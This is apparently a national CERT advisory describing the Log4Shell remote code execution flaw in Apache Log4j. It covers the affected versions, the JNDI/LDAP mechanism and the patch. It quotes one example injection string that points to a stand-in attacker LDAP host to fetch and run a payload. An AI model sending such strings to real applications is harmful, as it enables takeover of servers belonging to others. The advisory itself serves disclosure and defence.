A huge collection of 3400+ free website templates JAR theme com WP themes and more at the biggest community-driven free web design site
Home / security-advisories / Log4Shell: Apache Log4j Remote Code Execution (CVE-2021-44228)

Log4Shell: Apache Log4j Remote Code Execution (CVE-2021-44228)

Advisory No: TZCERT/SA/2021/12/14

Date of First Release: 14th December 2021

Source: Apache

Software Affected: All versions of Log4j from 2.0-beta9 to 2.14.1

Overview

Apache Log4j between versions log4j 2.0 to 2.14.1 are vulnerable to unauthenticated arbitrary code execution. A remote attacker can exploit the vulnerability to run malicious code on the affected machine.

Description

Log4j is an open-source logging software widely used to log information. Log4j is used by approximately 3 billion devices running Java, including web servers, mobile devices, and even smart devices such as fridges. The versions of the software are vulnerable to arbitrary code execution.

The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation component of the Lightweight Directory Access Protocol (LDAP) connector and can be triggered using an LDAP request. It allows an attacker to retrieve a payload from a remote server and execute it locally.

To exploit the vulnerability, an attacker sends a request that contains malicious payload to the application. The crafted payload looks like in the following request;

${jndi: ldap://attacker_controled_website/payload_to_be_executed}

Upon receiving the attacker’s payload, the vulnerable Log4j will interpret the input contained in the payload as a JNDI resource and make a request to the attacker’s controlled server to retrieve the requested resource. The attacker can send back a remote Java class file, which will then be loaded by the vulnerable application.

This vulnerability is assigned a CVE-2021-44228 with a CVSS severity score of 10 out of 10.

Impact

Successful exploitation of this vulnerability may allow an attacker to take control of the affected systems.

Solution:

Apache has issued updates to fix vulnerable versions of Log4j. Users and Administrators are encouraged to apply necessary updates.

References:

  1. https://logging.apache.org/log4j/2.x/security.html
  2. https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
  3. https://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/
  4. https://www.mcafee.com/blogs/cyberthreat-news/concerned-by-the-security-risk-affecting-popular-services-and-apps-heres-what-we-know/?utm_source=twitter_mcafee&utm_medium=social_organic&utm_term=&utm_content=&utm_campaign=&sf252051632=1
  5. https://blog.shiftleft.io/log4shell-apache-log4j-remote-code-execution-4f58ed7e74f9

Check Also

Authentication Bypass and Directory Traversal vulnerabilities for Zimbra email platform (CVE-2022-27925, CVE-2022-37042)

Advisory No: TZCERT/SA/2022/08/17 Date of First Release: 17th August 2022 Source: Zimbra Software Affected:  Zimbra  8.8.15  and 9.0 Overview: …